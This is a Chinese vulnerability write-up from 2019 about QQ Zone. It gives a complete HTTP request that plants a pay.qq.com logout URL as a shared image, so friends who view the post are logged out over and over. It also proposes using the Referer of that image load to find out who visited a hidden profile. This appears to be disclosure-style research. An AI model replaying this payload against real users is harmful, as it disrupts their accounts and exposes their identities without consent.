[关闭]
@1kbfree 2019-06-27T20:23:24.000000Z 字数 1422 阅读 1021

qq空间一处有趣的拒绝服务

漏洞挖掘


1、发送如下数据包

  1. POST /cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=1395430061&qzonetoken=3ca935b4acf8031d273301661877e5b2c7d888e0655d828df4496c05672e3898a1842753399054f2affef6ad HTTP/1.1
  2. Host: sns.qzone.qq.com
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
  4. Accept: */*
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded
  8. Referer: https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?desc=%E6%B5%8B%E8%AF%95%E4%B8%80%E4%B8%8B%E5%95%A6~&url=http://www.qq.com&showcount=1&desc=123&pics=http://www.slimego.cn/images/logo.png
  9. Content-Length: 300
  10. Cookie: 这是cookie
  11. DNT: 1
  12. Connection: close
  13. where=0&entryuin=1900065568&spaceuin=1900065568&title=123321&summary=123321&token=1395430061&sendparam=&description=%E6%B5%8B%E8%AF%95%E4%B8%80%E4%B8%8B%E5%95%A6~&type=4&url=http%3A%2F%2Fwww.qq.com&site=&to=&share2weibo=0&pics=https://pay.qq.com/cgi-bin/login/user_logout.cgi?1.png&fupdate=1&notice=1

注意这里的pics参数,这个值是一个 类似退出的url 那么这里的思路就是 用户点开空间然后<img src=https://pay.qq.com/cgi-bin/login/user_logout.cgi?1.png>,如图

image.png-252.8kB

导致用户后台自动访问退出的url(但是腾讯空间的退出url存在token,所以这是另一处清除域cookieurl)

那么来测试一下,有另一个号 点开空间

image.png-705.6kB

然后在刷新一下就会退出

image.png-1070.2kB

那么现在的危害就是,让我刷空间的好友 后台自动访问退出的url 然后导致无法正常操作 如评论、点赞、转发、发说说等 并且会一直跳转到登录处 所以个人觉得危害还是挺大的 而且这个方法还可以利用为获取到谁访问了qq空间(这个是针对那些黄钻会员隐藏了空间来源访问),那么我们就可以写入一个来源访问系统的,然后利用Referer所传递的值来知道是谁访问了我的qq空间(当我们登录qq空间后 会将手机号带入到url中,所以可以获取到访问我qq空间的用户的qq号,虽然危害不大 但是还算是一个设计缺陷 导致了外联可以访问)

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注